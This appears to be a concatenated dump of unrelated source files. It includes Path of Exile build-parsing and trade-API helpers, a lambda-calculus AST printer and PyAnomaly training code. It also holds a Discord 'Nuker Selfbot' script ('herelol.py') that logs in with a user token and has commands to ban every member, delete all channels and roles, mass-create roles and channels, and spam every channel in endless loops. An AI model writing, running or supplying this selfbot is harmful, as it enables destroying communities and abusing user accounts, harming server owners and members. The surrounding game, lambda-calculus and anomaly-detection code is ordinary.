stats['main_skill'] = skill_slots[main_group - 1].getchildren()[skill_in_group - 1].attrib['nameSpec']
except Exception:
stats['main_skill'] = " "
stats['crit_chance'] = tree.find('Build/PlayerStat[@stat="PreEffectiveCritChance"]').attrib['value']
stats['effective_crit_chance'] = tree.find('Build/PlayerStat[@stat="CritChance"]').attrib['value']
stats['chance_to_hit'] = tree.find('Build/PlayerStat[@stat="HitChance"]').attrib['value']
stats['str'] = tree.find('Build/PlayerStat[@stat="Str"]').attrib['value']
stats['dex'] = tree.find('Build/PlayerStat[@stat="Dex"]').attrib['value']
stats['int'] = tree.find('Build/PlayerStat[@stat="Int"]').attrib['value']
stats['life'] = tree.find('Build/PlayerStat[@stat="Life"]').attrib['value']
stats['life_regen'] = tree.find('Build/PlayerStat[@stat="LifeRegen"]').attrib['value']
stats['es'] = tree.find('Build/PlayerStat[@stat="EnergyShield"]').attrib['value']
stats['es_regen'] = tree.find('Build/PlayerStat[@stat="EnergyShieldRegen"]').attrib['value']
try:
stats['degen'] = tree.find('Build/PlayerStat[@stat="TotalDegen"]').attrib['value']
except AttributeError:
stats['degen'] = "0"
stats['evasion'] = tree.find('Build/PlayerStat[@stat="Evasion"]').attrib['value']
stats['block'] = tree.find('Build/PlayerStat[@stat="BlockChance"]').attrib['value']
stats['spell_block'] = tree.find('Build/PlayerStat[@stat="SpellBlockChance"]').attrib['value']
stats['dodge'] = tree.find('Build/PlayerStat[@stat="AttackDodgeChance"]').attrib['value']
stats['spell_dodge'] = tree.find('Build/PlayerStat[@stat="SpellDodgeChance"]').attrib['value']
stats['fire_res'] = tree.find('Build/PlayerStat[@stat="FireResist"]').attrib['value']
stats['cold_res'] = tree.find('Build/PlayerStat[@stat="ColdResist"]').attrib['value']
stats['light_res'] = tree.find('Build/PlayerStat[@stat="LightningResist"]').attrib['value']
stats['chaos_res'] = tree.find('Build/PlayerStat[@stat="ChaosResist"]').attrib['value']
try:
stats['power_charges'] = tree.find('Build/PlayerStat[@stat="PowerChargesMax"]').attrib['value']
except Exception:
stats['power_charges'] = '3'
try:
stats['frenzy_charges'] = tree.find('Build/PlayerStat[@stat="FrenzyChargesMax"]').attrib['value']
except Exception:
stats['frenzy_charges'] = '3'
try:
stats['endurance_charges'] = tree.find('Build/PlayerStat[@stat="EnduranceChargesMax"]').attrib['value']
except Exception:
stats['endurance_charges'] = '3'
except AttributeError:
raise OutdatedPoBException()
return stats
def parse_poe_char_api(json, cl, items_only=False):
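    '''
    Convert the official character-window API JSON into the same equipped/stats
    structure used for PoB imports. With items_only=True, items are collected
    under the "Item"/"items_objects" keys instead of equipment slots.
    '''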
rarity = {
0: "Normal",
1: "Magic",
2: "Rare",
3: "Unique",
4: "Gem"
}
equipped = {}
threads = []
obj_dict = {}
for item in json['items']:
# TODO: Find a more idiomatic way to do this
# As it is now, this dict should only ever contain values of type `int`
char_item = defaultdict(int)
        if (items_only and 'Prophecy' in item['icon']) or 'Divination' in item['icon']:
equipped['Item'] = item
continue
char_item['rarity'] = rarity[item['frameType']]
char_item['name'] = item["name"].split('>>')[-1]
if 'properties' in item:
for prop in item['properties']:
if prop['name'] == "Quality":
char_item['quality'] = int(prop['values'][0][0][1:-1])
# Weapon stats
if prop['name'] == "Physical Damage":
char_item['physical_min'] = prop['values'][0][0].split('-')[0]
char_item['physical_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Fire Damage":
char_item['fire_min'] = prop['values'][0][0].split('-')[0]
char_item['fire_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Cold Damage":
char_item['cold_min'] = prop['values'][0][0].split('-')[0]
char_item['cold_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Lightning Damage":
char_item['lightning_min'] = prop['values'][0][0].split('-')[0]
char_item['lightning_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Chaos Damage":
char_item['chaos_min'] = prop['values'][0][0].split('-')[0]
char_item['chaos_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Critical Strike Chance":
char_item['critical_chance'] = prop['values'][0][0]
if prop['name'] == "Attacks per Second":
char_item['attack_speed'] = prop['values'][0][0]
if prop['name'] == "Weapon Range":
char_item['range'] = prop['values'][0][0]
# Armour Stats
if prop['name'] == "Armour":
char_item['armour'] = prop['values'][0][0]
if prop['name'] == "Energy Shield":
char_item['energy_shield'] = prop['values'][0][0]
if prop['name'] == "Evasion":
char_item['evasion'] = prop['values'][0][0]
if char_item['name'] == '':
char_item['name'] = item["typeLine"]
if char_item['rarity'] == "Magic":
char_item['base'] = get_base_from_magic(item['typeLine'])
else:
char_item['base'] = item["typeLine"]
if items_only:
slot = "Item"
elif 'Ring' in item['inventoryId']:
slot = "Ring 2" if "2" in item['inventoryId'] else "Ring 1"
elif item['inventoryId'] == "Offhand":
slot = "Weapon 2"
elif item['inventoryId'] == "Weapon":
slot = "Weapon 1"
elif item['inventoryId'] == "Helm":
slot = "Helmet"
elif item['inventoryId'] == "BodyArmour":
slot = "Body Armour"
elif item['inventoryId'] == "Flask":
slot = f"Flask {int(item['x']) + 1}"
char_item['name'] = item["typeLine"].split('>>')[-1]
if item['frameType'] == 1 and 'Flask of' in char_item['name']:
char_item['rarity'] = "Magic"
elif item['inventoryId'] in ['Amulet', 'Helm', 'Gloves', 'Belt', 'Flask', 'Boots', 'Weapon', 'PassiveJewels']:
slot = item['inventoryId']
else:
continue
if 'implicitMods' in item:
char_item['implicits'] = item['implicitMods']
else:
char_item['implicits'] = []
if 'explicitMods' in item:
char_item['explicits'] = item['explicitMods']
else:
char_item['explicits'] = []
if 'craftedMods' in item:
for mod in item['craftedMods']:
# FIXME: unresolved attribute
char_item['explicits'].append("{crafted}"f"{mod}")
if 'corrupted' in item:
# FIXME: unresolved attribute
char_item['explicits'].append('Corrupted')
if 'enchantMods' in item:
char_item['implicits'] = ["{crafted}" + item['enchantMods'][0]]
equipped[slot] = {}
if slot == 'PassiveJewels' or items_only:
if type(equipped[slot]) is dict:
equipped[slot] = []
equipped[slot].append(char_item)
else:
equipped[slot] = char_item
if 'socketedItems' in item and not items_only:
equipped[slot]['gems'] = []
for socketed in item['socketedItems']:
if socketed['frameType'] == 4:
gem_d = {'name': socketed['typeLine']}
for prop in socketed['properties']:
if prop['name'] == 'Quality':
gem_d['quality'] = prop['values'][0][0].replace('+', '').replace('%', '')
if prop['name'] == 'Level':
gem_d['level'] = prop['values'][0][0]
if 'quality' not in gem_d:
gem_d['quality'] = 0
equipped[slot]['gems'].append(gem_d)
if slot != 'PassiveJewels' and 'Flask' not in slot:
t = threading.Thread(target=_get_wiki_base, args=(char_item, obj_dict, cl, slot, True))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if items_only:
equipped["items_objects"] = []
for slot in obj_dict:
if not items_only:
equipped[slot]['object'] = obj_dict[slot]
else:
equipped["items_objects"] = obj_dict[slot]
stats = {'equipped': equipped}
if 'character' in json:
stats['level'] = json['character']['level']
stats['ascendancy'] = json['character']['ascendancyClass']
stats['class'] = json['character']['class']
stats['charname'] = json['character']['name']
stats['league'] = json['character']['league']
return stats
def get_base_from_magic(name: str):
return ' '.join(name.split("of")[0].split("'")[-1].split()[1:])
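# Illustrative example for get_base_from_magic (hypothetical magic item name):
#   "Hale Crystal Belt of the Whelpling" -> "Crystal Belt"
# i.e. it drops the single prefix word and everything from "of" onwards.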
def poe_skill_tree(hashes, asc: str = "None", return_keystones=False, return_asc=False):
char = {
"marauder": 1,
"ranger": 2,
"witch": 3,
"duelist": 4,
"templar": 5,
"shadow": 6,
"scion": 7
}
ascendancy_bytes = {
"marauder": {
"none": 0,
"juggernaut": 1,
"berserker": 2,
"chieftain": 3
},
"ranger": {
"none": 0,
"raider": 1,
"deadeye": 2,
"pathfinder": 3
},
"witch": {
"none": 0,
"occultist": 1,
"elementalist": 2,
"necromancer": 3
},
"duelist": {
"none": 0,
"slayer": 1,
"gladiator": 2,
"champion": 3
},
"templar": {
"none": 0,
"inquisitor": 1,
"hierophant": 2,
"guardian": 3
},
"shadow": {
"none": 0,
"assassin": 1,
"trickster": 2,
"saboteur": 3
},
"scion": {
"none": 0,
"ascendant": 1
}
}
# This took me a real assload of time to figure out
# Either the 4th only or the first 4 bytes represent tree/b64 format version on poe side
# 5th and 6th byte are character class and ascendancy respectively
# Not sure if 7th byte should inherently be 0, but I think its related to start/exit nodes
ba = bytearray([0, 0, 0, 4])
char_class = None
asc = asc.lower()
for a_char in ascendancy_bytes:
if asc in ascendancy_bytes[a_char]:
char_class = a_char
break
if not char_class:
char_class = asc
asc = "none"
ba += bytes([char[char_class]])
ba += bytes([ascendancy_bytes[char_class][asc.lower()]])
ba += bytes([0])
for hash_obj in hashes:
ba += hash_obj.to_bytes(2, 'big')
post = binascii.b2a_base64(ba).decode().replace('+', '-').replace('/', '_')
tree_keystones = []
ascendancy = []
for hash_obj in hashes:
if str(hash_obj) in keystones:
tree_keystones.append(keystones[str(hash_obj)])
if str(hash_obj) in asc_nodes:
ascendancy.append(asc_nodes[str(hash_obj)])
if return_keystones and return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones, ascendancy
elif return_keystones and not return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones
elif return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", ascendancy
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}"
def get_active_leagues():
http = urllib3.PoolManager()
resp = http.request('GET', 'https://www.pathofexile.com/api/trade/data/leagues')
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
leagues = js.loads(resp.data.decode('utf-8'))
return leagues['result']
def _trade_api_query(data, league, endpoint):
http = urllib3.PoolManager()
print(js.dumps(data).encode('utf-8'))
resp = http.request(
'POST', f'https://www.pathofexile.com/api/trade/{endpoint}/{league}',
body=js.dumps(data).encode('utf-8'), headers={'Content-Type': 'application/json'}
)
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
json_result = js.loads(resp.data.decode('utf-8'))
listing_ids = json_result['result']
entries = http.request('GET', f'https://www.pathofexile.com/api/trade/fetch/{",".join(listing_ids[:10])}')
if entries.status != 200:
raise RequestException(entries.data.decode('utf-8'))
return js.loads(entries.data.decode('utf-8'))['result']
def currency_rates(have: str, want: str, league: str):
data = {
"exchange": {
"status": {
"option": "online"
},
"have": [have],
"want": [want]
}
}
listings = _trade_api_query(data, league, 'exchange')
return CurrencyQuery(have, want, league, listings)
def item_price(item, league):
data = {
"query": {
"term": item,
"status": {
"option": "online"
}
},
"sort": {
"price": "asc"
},
}
listings = _trade_api_query(data, league, 'search')
return ItemPriceQuery(item, league, listings)
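# Minimal usage sketch of the trade helpers (currency ids and league name are
# illustrative placeholders; any league returned by get_active_leagues() would work):
#   rates = currency_rates("chaos", "exalted", "Standard")
#   price = item_price("Headhunter", "Standard")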
``` |
{
"source": "JokerThy/Discord-Selfot",
"score": 3
} |
#### File: JokerThy/Discord-Selfot/herelol.py
```python
import discord
from discord.ext import commands
import asyncio
import random
import os
##Bot Sup##
prefix = input("Enter A Prefix: ")
token = input("Enter Your Token: ")
spam = input("Enter A Spam Message: ")
channel = input("Enter Channel Names: ")
roles = input("Enter Role Names: ")
##Setup Finished##
client = commands.Bot(command_prefix=prefix, case_insensitive=True, self_bot=True)
client.remove_command(name="help")
os.system('cls' if os.name == 'nt' else 'clear')
@client.event
async def on_ready():
print(f'''
______ ______ ______ __ __ __ __ __ ______ __
/\__ _\ /\ ___\ /\ == \ /\ "-./ \ /\ \ /\ "-.\ \ /\ __ \ /\ \
\/_/\ \/ \ \ __\ \ \ __< \ \ \-./\ \ \ \ \ \ \ \-. \ \ \ __ \ \ \ \____
\ \_\ \ \_____\ \ \_\ \_\ \ \_\ \ \_\ \ \_\ \ \_\\"\_\ \ \_\ \_\ \ \_____\
\/_/ \/_____/ \/_/ /_/ \/_/ \/_/ \/_/ \/_/ \/_/ \/_/\/_/ \/_____/
------------------------------------------------------------------ Nuker Selfbot Is Online <$
''')
@client.command()
async def destroy(ctx):
for channel in ctx.guild.channels:
await channel.delete()
@client.command(pass_context=True)
async def help(ctx):
await ctx.message.delete()
embed = discord.Embed(color=000000, timestamp=ctx.message.created_at)
embed.set_author(name=" 🌠Terminal Nuker")
embed.add_field(name="{prefix}flood", value="```Spams the same message in every channel!``` 🔱")
embed.add_field(name="{prefix}spam {amount} {message}", value="```spams the message how much times you want in a single channel```🔱")
embed.add_field(name="{prefix}destroy", value="```Deletes all the channels in the guild```🔱")
embed.add_field(name="{prefix}roles", value="```Deletes all the roles, and makes new roles!```🔱")
embed.add_field(name="{prefix}flood", value="```Floods the channels with pings!```🔱")
embed.add_field(name="{prefix}nuke", value="```This will delete all channels and roles, and make new roles and channels and will spam inside every channel.```🔱")
embed.set_image(url="")
await ctx.send(embed=embed)
@client.command()
async def flood(ctx):
guild = ctx.message.guild
await ctx.message.delete()
await ctx.send("`selfbot is now spamming!`")
while True:
for channel in guild.text_channels:
await channel.send({spam})
@client.command()
async def roles(ctx):
guild = ctx.message.guild
for role in guild.roles:
try:
await role.delete()
print("Roles have been deleted")
except:
pass
print("Roles could not be deleted")
for i in range(250):
try:
await guild.create_role(name=roles)
print("Role has been created")
except:
print("Role could not be created")
pass
@client.command(pass_context=True)
async def nuke(ctx):
await ctx.message.delete()
guild = ctx.message.guild
print("ENTERING: Banning members")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print("User" +member.name + "Has Been Banned")
except:
pass
await ctx.send("`Banned all!`")
#deleting channels
print("ENTERING: Deleting channels")
try:
for channel in ctx.guild.channels:
await channel.delete()
print("Channel deleted")
except:
pass
print("Channel could not be deleted")
#creating channels
print("ENTERING: Creating channels")
try:
for i in range(250):
guild = ctx.message.guild
await guild.create_text_channel(channels)
print("Channel created")
except:
pass
print("Channel could not be created")
print("ENTERING: Spamming messages")
while True:
for channel in guild.text_channels:
await channel.send(spam)
@client.command()
async def spam(ctx, amount:int=None, *, message: str=None):
await ctx.message.delete()
try:
if amount is None or message is None:
await ctx.send(f"Usage: `{ctx.prefix}spam <amount> <message>`")
else:
for each in range (0, amount):
await ctx.send(f"{message}")
except Exception as e:
await ctx.send(f"Error: {e}")
client.run(token, bot=False)
``` |
{
"source": "Joker-vD/onepass-lambda-compiler",
"score": 4
} |
#### File: Joker-vD/onepass-lambda-compiler/olc_ast.py
```python
def lam(param, body):
return ('LAM', param, body)
def app(fun, arg):
return ('APP', fun, arg)
# No idea who invented this trick first, I've seen it in the code accompanying <NAME>'s TAPL;
# basically, you kinda track what priority level the expression you're about to print has, and put parens
# around it if it's low enough to need it. Here, level 0 is "either top or a body of a lambda", level 1 is
# "lhs of the application", and level 2 is "rhs of an application". Variables never need parens, lambdas
# need parens if they're being applied from whatever side, and applications need parens only when they're
# on the rhs of another application
def lam2str(term, level=0):
if isinstance(term, str):
return term
kind, car, cdr = term
if kind == 'LAM':
result = f'λ{car}. {lam2str(cdr, 0)}'
if level > 0:
result = f'({result})'
return result
if kind == 'APP':
result = f'{lam2str(car, 1)} {lam2str(cdr, 2)}'
if level > 1:
result = f'({result})'
return result
raise Exception(f'not a lambda term: {term}')
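# A minimal usage sketch (not part of the original file), showing how the level
# argument controls parenthesization:
#   identity = lam('x', 'x')
#   omega = app(lam('x', app('x', 'x')), lam('x', app('x', 'x')))
#   lam2str(identity)  ->  'λx. x'
#   lam2str(omega)     ->  '(λx. x x) (λx. x x)'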
``` |
{
"source": "JokerWDL/PyAnomaly",
"score": 3
} |
#### File: core/engine/default_engine.py
```python
import torch
from lib.core.utils import AverageMeter
from .utils import engine_save_checkpoint
from .utils import engine_save_model
from .abstract import AbstractTrainer, AbstractInference
class DefaultTrainer(AbstractTrainer):
''' __init__ template
the inf trainer
'''
def __init__(self, *defaults, **kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model: the model of the experiment
1->train_dataloader: the dataloader
2->val_dataloader: the dataloader
3->optimizer: the optimizer of the network
4->loss_function: the loss function of the model
5->logger: the logger of the whole training process
6->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
                pretrain(bool): True-> use the pretrained model
'''
# logger & config
self.logger = defaults[5]
self.config = defaults[6]
# basic things
if kwargs['parallele']:
self.model = self.data_parallel(defaults[0])
else:
self.model = defaults[0].cuda()
if kwargs['pretrain']:
self.load_pretrain()
self.train_dataloader = defaults[1]
self.val_dataloader = defaults[2]
self.optimizer = defaults[3]
self.loss_function = defaults[4]
# basic meter
self.batch_time = AverageMeter()
self.data_time = AverageMeter()
self.loss_basic = AverageMeter()
# others
self.verbose = kwargs['verbose']
self.accuarcy = 0.0 # to store the accuracy varies from epoch to epoch
self.kwargs = kwargs
self.result_path = '.'
self.log_step = 5 # how many steps to print the information
self.eval_step = 5 # how many steps to use the val dataset to test the model
self.save_step = 5
if self.config.RESUME.flag:
self.resume()
if self.config.FINETUNE.flag:
self.fine_tune()
def load_pretrain(self):
model_path = self.config.MODEL.pretrain_model
        if model_path == '':
            self.logger.info('=> No pre-trained model! Training from scratch')
else:
self.logger.info('=>Loading the model in {}'.format(model_path))
pretrain_model = torch.load(model_path)
if 'epoch' in pretrain_model.keys():
self.logger.info('(|_|) ==> Use the check point file')
self.model.load_state_dict(pretrain_model['model_state_dict'])
else:
self.logger.info('(+_+) ==> Use the model file')
self.model.load_state_dict(pretrain_model['state_dict'])
def resume(self):
self.logger.info('=> Resume the previous training')
checkpoint_path = self.config.RESUME.checkpoint_path
self.logger.info('=> Load the checkpoint from {}'.format(checkpoint_path))
checkpoint = torch.load(checkpoint_path)
self.model.load_state_dict(checkpoint['model_state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
def fine_tune(self):
layer_list = self.config.FINETUNE.layer_list
self.logger.info('=> Freeze layers except start with:{}'.format(layer_list))
for n, p in self.model.named_parameters():
parts = n.split('.')
# consider the data parallel situation
if parts[0] == 'module':
if parts[1] not in layer_list:
p.requires_grad = False
if p.requires_grad:
print(n)
else:
if parts[0] not in layer_list:
p.requires_grad = False
if p.requires_grad:
print(n)
self.logger.info('Finish Setting freeze layers')
def data_parallel(self, model):
'''
Data parallel the model
'''
self.logger.info('<!_!> ==> Data Parallel')
gpus = [int(i) for i in range(self.config.SYSTEM.num_gpus)]
model_parallel = torch.nn.DataParallel(model.cuda(), device_ids=gpus)
return model_parallel
'''
Run the whole process:
1. print the log information ( before_step)
2. execute training process (train)
3. evaluate(including the validation and test) -
| --> (after_step)
4. save model -
'''
def before_step(self, current_step):
pass
def after_step(self, current_step):
# acc = 0.0
for h in self._hooks:
h.after_step(current_step)
if (current_step % self.eval_step != 0) or current_step == 0:
self.mini_eval(current_step)
return
def after_train(self):
for h in self._hooks:
h.after_train()
self.save(self.config.TRAIN.max_steps)
def save(self, current_epoch, best=False):
'''
self.saved_model: is the model or a dict of combination of models
self.saved_optimizer: is the optimizer or a dict of combination of optimizers
self.saved_loss: the loss or a dict of the combination of loss
'''
if best:
engine_save_checkpoint(self.config, self.kwargs['config_name'], self.saved_model, current_epoch, self.saved_loss, self.saved_optimizer, self.logger, self.kwargs['time_stamp'], self.accuarcy, flag='best', verbose=(self.kwargs['model_type'] + '#' + self.verbose),best=best)
self.result_path = engine_save_model(self.config, self.kwargs['config_name'], self.saved_model, self.logger, self.kwargs['time_stamp'], self.accuarcy, verbose=(self.kwargs['model_type'] + '#' + self.verbose), best=best)
else:
engine_save_checkpoint(self.config, self.kwargs['config_name'], self.saved_model, current_epoch, self.saved_loss, self.saved_optimizer, self.logger, self.kwargs['time_stamp'], self.accuarcy, verbose=(self.kwargs['model_type'] + '#' + self.verbose), best=best)
def train(self,current_step):
raise Exception('Need to implement the train function!!')
def evaluate(self, current_step):
'''
Evaluate the results of the model
!!! Will change, e.g. accuracy, mAP.....
!!! Or can call other methods written by the official
Returns:
metric: the metric
'''
raise Exception('Need to implement the evaluation function, return the score')
class DefaultInference(AbstractInference):
'''__init__ template
'''
def __init__(self, *defaults,**kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model: the model of the experiment
1->model_path: the path of the model path
2->val_dataloader: the dataloader to inference
3->logger: the logger of the whole process
4->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
                pretrain(bool): True-> use the pretrained model
                mode(str): 'dataset' -> the data is passed in via the dataloader (discarded, because we use the dataset to get everything we need)
'''
self.logger = defaults[3]
self.config = defaults[4]
self.model_path = defaults[1]
if kwargs['parallel']:
self.model = self.data_parallel(defaults[0])
else:
self.model = defaults[0]
self.load()
self.verbose = kwargs['verbose']
self.kwargs = kwargs
self.mode = kwargs['mode']
self.metric = 0.0
def load(self):
        if isinstance(self.model, dict):
for k, v in self.model.items():
temp = torch.load(self.model_path)
if k[0] == 'F':
continue
self.model[k].load_state_dict(temp[k[0]])
else:
self.model.load_state_dict(torch.load(self.model_path))
def data_parallel(self, model):
'''
Data parallel the model
'''
self.logger.info('<!_!> ==> Data Parallel')
gpus = [int(i) for i in self.config.SYSTEM.gpus]
model_parallel = torch.nn.DataParallel(model, device_ids=gpus).cuda()
return model_parallel
def inference(self, current_step):
if self.mode == 'dataset':
metric = self.evaluate()
elif self.mode == 'other':
self.get_result()
else:
raise Exception('Wrong inference mode')
def get_result(self):
'''
Get the results for one image
'''
raise Exception('Need to implement the get_result function, return the score')
def extract_feature(self):
'''
Get the feature of input
'''
pass
def save(self):
'''
Save the results or the feature
'''
pass
```
#### File: core/hook/stae_hooks.py
```python
import os
import pickle
import cv2
import numpy as np
import torch
from torch.utils.data import DataLoader
from collections import OrderedDict
import matplotlib.pyplot as plt
from tsnecuda import TSNE
from scipy.ndimage import gaussian_filter1d
from .abstract.abstract_hook import HookBase
from lib.datatools.evaluate.utils import reconstruction_loss
from lib.datatools.evaluate.gtloader import GroundTruthLoader
# from lib.datatools.evaluate import eval_api
from lib.core.utils import tsne_vis, tensorboard_vis_images, save_results
HOOKS = ['STAEEvaluateHook']
class STAEEvaluateHook(HookBase):
def after_step(self, current_step):
acc = 0.0
if current_step % self.trainer.eval_step == 0 and current_step != 0:
with torch.no_grad():
acc = self.evaluate(current_step)
if acc > self.trainer.accuarcy:
self.trainer.accuarcy = acc
# save the model & checkpoint
self.trainer.save(current_step, best=True)
elif current_step % self.trainer.save_step == 0 and current_step != 0:
# save the checkpoint
self.trainer.save(current_step)
                    self.trainer.logger.info('LOL==>the accuracy is not improved in epoch{} but the checkpoint is saved anyway'.format(current_step))
else:
pass
else:
pass
def inference(self):
# import ipdb; ipdb.set_trace()
self.trainer.set_requires_grad(self.trainer.STAE, False)
acc = self.evaluate(0)
self.trainer.logger.info(f'The inference metric is:{acc:.3f}')
def evaluate(self, current_step):
'''
Evaluate the results of the model
!!! Will change, e.g. accuracy, mAP.....
!!! Or can call other methods written by the official
'''
self.trainer.STAE.eval()
tb_writer = self.trainer.kwargs['writer_dict']['writer']
global_steps = self.trainer.kwargs['writer_dict']['global_steps_{}'.format(self.trainer.kwargs['model_type'])]
frame_num = self.trainer.config.DATASET.test_clip_length
clip_step = self.trainer.config.DATASET.test_clip_step
psnr_records=[]
score_records=[]
# total = 0
num_videos = 0
random_video_sn = torch.randint(0, len(self.trainer.test_dataset_keys), (1,))
# calc the score for the test dataset
for sn, video_name in enumerate(self.trainer.test_dataset_keys):
num_videos += 1
# need to improve
dataset = self.trainer.test_dataset_dict[video_name]
len_dataset = dataset.pics_len
# test_iters = len_dataset - frame_num + 1
test_iters = len_dataset // clip_step
test_counter = 0
data_loader = DataLoader(dataset=dataset, batch_size=1, shuffle=False, num_workers=1)
vis_range = range(int(len_dataset*0.5), int(len_dataset*0.5 + 5))
# scores = np.empty(shape=(len_dataset,),dtype=np.float32)
scores = torch.zeros(len_dataset)
# scores = [0.0 for i in range(len_dataset)]
for clip_sn, test_input in enumerate(data_loader):
test_target = test_input.cuda()
time_len = test_input.shape[2]
output, pred = self.trainer.STAE(test_target)
clip_score = reconstruction_loss(output, test_target)
# score = np.array(score.tolist() * time_len)
if len_dataset < (test_counter+1) * time_len:
# import ipdb; ipdb.set_trace()
clip_score = clip_score[:,0:len_dataset-(test_counter)*time_len]
if len(clip_score.shape) >= 2:
clip_score = clip_score.sum(dim=0)
try:
scores[test_counter*time_len:(test_counter + 1)*time_len] = clip_score.squeeze(0)
except:
import ipdb; ipdb.set_trace()
# scores[test_counter+frame_num-1] = score
# import ipdb; ipdb.set_trace()
test_counter += 1
if sn == random_video_sn and (clip_sn in vis_range):
vis_objects = OrderedDict()
vis_objects['stae_eval_clip'] = test_target.detach()
vis_objects['stae_eval_clip_hat'] = output.detach()
tensorboard_vis_images(vis_objects, tb_writer, global_steps, normalize=self.trainer.val_normalize, mean=self.trainer.val_mean, std=self.trainer.val_std)
if test_counter >= test_iters:
# import ipdb; ipdb.set_trace()
# import ipdb; ipdb.set_trace()
# scores[:frame_num-1]=(scores[frame_num-1],) # fix the bug: TypeError: can only assign an iterable
smax = max(scores)
smin = min(scores)
# normal_scores = np.array([(1.0 - np.divide(s-smin, smax)) for s in scores])
normal_scores = (1.0 - torch.div(scores-smin, smax)).detach().cpu().numpy()
score_records.append(normal_scores)
print(f'finish test video set {video_name}')
break
self.trainer.pkl_path = save_results(self.trainer.config, self.trainer.logger, verbose=self.trainer.verbose, config_name=self.trainer.config_name, current_step=current_step, time_stamp=self.trainer.kwargs["time_stamp"],score=score_records)
results = self.trainer.evaluate_function(self.trainer.pkl_path, self.trainer.logger, self.trainer.config, self.trainer.config.DATASET.score_type)
self.trainer.logger.info(results)
tb_writer.add_text('amc: AUC of ROC curve', f'auc is {results.auc}',global_steps)
return results.auc
def get_stae_hooks(name):
if name in HOOKS:
t = eval(name)()
else:
raise Exception('The hook is not in amc_hooks')
return t
```
#### File: lib/core/ocae.py
```python
import warnings
warnings.filterwarnings('ignore')
import os
import pickle
import math
import torch
import time
import numpy as np
from PIL import Image
from collections import OrderedDict
from torch.utils.data import DataLoader
import torchvision.transforms as T
import torchvision.transforms.functional as tf
from lib.core.engine.default_engine import DefaultTrainer, DefaultInference
from lib.core.utils import AverageMeter, multi_obj_grid_crop, frame_gradient, get_batch_dets, tensorboard_vis_images
from lib.datatools.evaluate.utils import psnr_error
class Trainer(DefaultTrainer):
NAME = ["OCAE.TRAIN"]
def __init__(self, *defaults, **kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model:{'Generator':net_g, 'Driscriminator':net_d, 'FlowNet':net_flow}
1->train_dataloader: the dataloader
2->val_dataloader: the dataloader
3->optimizer:{'optimizer_g':op_g, 'optimizer_d'}
4->loss_function: {'g_adverserial_loss':.., 'd_adverserial_loss':..., 'gradient_loss':.., 'opticalflow_loss':.., 'intentsity_loss':.. }
5->logger: the logger of the whole training process
6->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
                pretrain(bool): True-> use the pretrained model
extra param:
test_dataset_keys: the dataset keys of each video
test_dataset_dict: the dataset dict of whole test videos
'''
self._hooks = []
self._register_hooks(kwargs['hooks'])
# logger & config
self.logger = defaults[5]
self.config = defaults[6]
model = defaults[0]
# basic things
if kwargs['parallel']:
self.A = self.data_parallel(model['A'])
self.B = self.data_parallel(model['B'])
self.C = self.data_parallel(model['C'])
self.Detector = self.data_parallel(model['Detector'])
else:
self.A = model['A'].cuda()
self.B = model['B'].cuda()
self.C = model['C'].cuda()
self.Detector = model['Detector'].cuda()
if kwargs['pretrain']:
self.load_pretrain()
self.train_dataloader = defaults[1]
self._train_loader_iter = iter(self.train_dataloader)
self.val_dataloader = defaults[2]
self._val_loader_iter = iter(self.val_dataloader)
# get the optimizer
optimizer = defaults[3]
self.optim_ABC = optimizer['optimizer_abc']
# get the loss_fucntion
loss_function = defaults[4]
self.a_loss = loss_function['A_loss']
self.b_loss = loss_function['B_loss']
self.c_loss = loss_function['C_loss']
# basic meter
self.batch_time = AverageMeter()
self.data_time = AverageMeter()
self.loss_meter_A = AverageMeter()
self.loss_meter_B = AverageMeter()
self.loss_meter_C = AverageMeter()
self.loss_meter_ABC = AverageMeter()
self.psnr = AverageMeter()
# others
self.verbose = kwargs['verbose']
self.accuarcy = 0.0 # to store the accuracy varies from epoch to epoch
self.config_name = kwargs['config_name']
self.kwargs = kwargs
self.train_normalize = self.config.ARGUMENT.train.normal.use
self.train_mean = self.config.ARGUMENT.train.normal.mean
self.train_std = self.config.ARGUMENT.train.normal.std
self.val_normalize = self.config.ARGUMENT.train.normal.use
self.val_mean = self.config.ARGUMENT.train.normal.mean
self.val_std = self.config.ARGUMENT.train.normal.std
# self.total_steps = len(self.train_dataloader)
self.result_path = ''
self.log_step = self.config.TRAIN.log_step # how many the steps, we will show the information
self.eval_step = self.config.TRAIN.eval_step
self.vis_step = self.config.TRAIN.vis_step # how many the steps, we will vis
self.save_step = self.config.TRAIN.save_step # save the model whatever the acc of the model
self.max_steps = self.config.TRAIN.max_steps
# self.testing_data_folder = self.config.DATASET.test_path
self.test_dataset_keys = kwargs['test_dataset_keys']
self.test_dataset_dict = kwargs['test_dataset_dict']
self.cluster_dataset_keys = kwargs['cluster_dataset_keys']
self.cluster_dataset_dict = kwargs['cluster_dataset_dict']
self.evaluate_function = kwargs['evaluate_function']
# hypyer-parameters of loss
self.loss_lamada = kwargs['loss_lamada']
# the lr scheduler
lr_scheduler_dict = kwargs['lr_scheduler_dict']
self.lr_abc = lr_scheduler_dict['optimizer_abc_scheduler']
if self.config.RESUME.flag:
self.resume()
if self.config.FINETUNE.flag:
self.fine_tune()
def train(self,current_step):
# Pytorch [N, C, D, H, W]
# initialize
start = time.time()
self.A.train()
self.B.train()
self.C.train()
self.Detector.eval()
writer = self.kwargs['writer_dict']['writer']
